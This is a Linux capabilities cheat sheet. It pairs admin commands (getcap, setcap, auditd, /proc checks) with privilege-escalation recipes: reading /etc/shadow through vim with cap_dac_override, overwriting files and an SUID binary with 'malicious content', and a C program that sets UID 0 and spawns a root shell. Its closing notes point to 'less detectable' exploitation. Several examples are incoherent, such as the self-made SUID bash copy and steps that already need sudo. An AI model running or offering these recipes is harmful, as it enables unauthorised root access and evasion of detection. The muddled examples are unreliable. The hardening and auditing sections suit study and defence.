# capabilities

#### Find binaries with capabilities

```sh
find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \;
```

#### Set cap\_net\_bind\_service capability (Allows binding to privileged ports)

```sh
sudo setcap cap_net_bind_service=+ep /usr/bin/my_program
```

#### Clear capabilities

```sh
sudo setcap -r /usr/bin/my_program

```

#### List capabilities of a specific file

```sh
getcap /usr/bin/my_program
```

#### Using cap\_dac\_override to read a normally restricted file (Dangerous, be very careful)

```sh
/usr/bin/vim.basic /etc/shadow
```

#### Using cap\_dac\_override to overwrite a file

```bash
echo "evil code" > /tmp/evil.sh
chmod +x /tmp/evil.sh
echo -e ':%s/original content/malicious content/\nwq!' | /usr/bin/vim.basic -es /path/to/important/file # Very dangerous
```

#### Overwriting an SUID binary

```bash
cp /bin/bash /tmp/suid_bash
chmod u+s /tmp/suid_bash
echo -e ':%s/original content/malicious content/\nwq!' | /usr/bin/vim.basic -es /tmp/suid_bash # Very dangerous
```

#### Using cap\_setuid to change user ID (Requires compiled C program)

Save the following code as `setuid.c`:

```c
#include <unistd.h>
#include <sys/capability.h>
#include <stdio.h>

int main() {
    cap_value_t cap_list[1];
    cap_list[0] = CAP_SETUID;
    cap_t caps = cap_get_proc();
    cap_set_flag(caps, CAP_EFFECTIVE, 1, cap_list, CAP_SET);
    cap_set_proc(caps);
    cap_free(caps);
    setuid(0); // Set UID to root
    execl("/bin/sh", "/bin/sh", NULL);
    return 0;
}
```

Compile and run:

```bash
gcc setuid.c -o setuid -lcap
sudo setcap cap_setuid+ep ./setuid
./setuid
```

#### Using cap\_sys\_admin to mount a file system

```bash
mkdir /tmp/mnt
dd if=/dev/zero of=/tmp/loopback.img bs=1M count=10
mkfs.ext4 /tmp/loopback.img
sudo setcap cap_sys_admin+ep /bin/mount
mount /tmp/loopback.img /tmp/mnt -o loop
sudo setcap cap_sys_admin+ep /bin/umount
umount /tmp/mnt
```

#### Using auditd to log capability usage

Install and configure auditd:

```bash
sudo apt install auditd # or yum install auditd, etc.
sudo systemctl enable auditd
sudo systemctl start auditd
sudo auditctl -a always,exit -F arch=b64 -S capset,setcap,getcap -k capabilities
```

View logs:

```bash
sudo ausearch -k capabilities -ts recent
```

#### Checking bounding sets

```bash
cat /proc/self/status | grep CapBnd
```

#### Checking effective, permitted, and inheritable sets

```bash
cat /proc/self/status | grep Cap
```

#### Checking the capabilities of a running process

```bash
sudo cat /proc/$(pidof processname)/status | grep Cap
```

#### **Key Concepts:**

* **Fine-grained Privileges:** Capabilities allow for more specific control over permissions than the traditional user/group model.
* **Reduced Attack Surface:** By granting only necessary capabilities, you limit the potential damage from compromised processes.
* **Vulnerabilities:**
  * Over-privileging: Giving processes more capabilities than they need.
  * Inadequate Sandboxing: Allowing capable processes to interact with untrusted data or processes.
  * Misconfiguration: Incorrectly setting or understanding capability values.
* **`setcap` Command:** Used to assign capabilities to executables.
* **Capability Values:**
  * `=` (clear capabilities)
  * `+ep` (effective and permitted)
  * `+ei` (effective and inheritable)
  * `+p` (permitted)
* **Dangerous Capabilities:**
  * `cap_sys_admin`: Broad administrative privileges.
  * `cap_setuid`: Change user ID.
  * `cap_setgid`: Change group ID.
  * `cap_dac_override`: Bypass file permission checks.
* **Enumeration:** `find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \;`
* **Exploitation Example:** Using `cap_dac_override` to modify `/etc/passwd` and gain root access.

**Important Considerations and Enhancements:**

* **Security Best Practices:**
  * Principle of Least Privilege: Grant only the necessary capabilities.
  * Regular Audits: Review capability assignments to ensure they are still appropriate.
  * Strong Sandboxing: Isolate capable processes as much as possible.
  * Use of tools like `auditd` to log capability usage.
* **Capability Sets:** Understand the difference between permitted, effective, inheritable, and bounding capability sets.
* **Bounding Set:** The bounding set limits the capabilities that a process can acquire, even if they are permitted. This is a crucial security feature.
* **File Capabilities vs. Thread Capabilities:** Understand how capabilities are applied to files and threads.
* **Namespaces:** Combine capabilities with namespaces (e.g., user namespaces) for even stronger isolation.
* **Modern Distributions:** Modern Linux distributions often have enhanced security features that mitigate some capability-related risks, but careful configuration is still essential.
* **Real World Exploits:** Research real world exploits that utilize linux capabilities. This will enhance your understanding of how they can be used maliciously.
* **Alternative to modifying /etc/passwd:** While the example given works, it is very dangerous, and easily detectable. There are many other ways of exploiting `cap_dac_override` that are less detectable. For example, overwriting a SUID binary.
* **Capabilities and containers:** Capabilities are used extensively in containerization technologies like Docker and Kubernetes. Understanding them is vital for container security.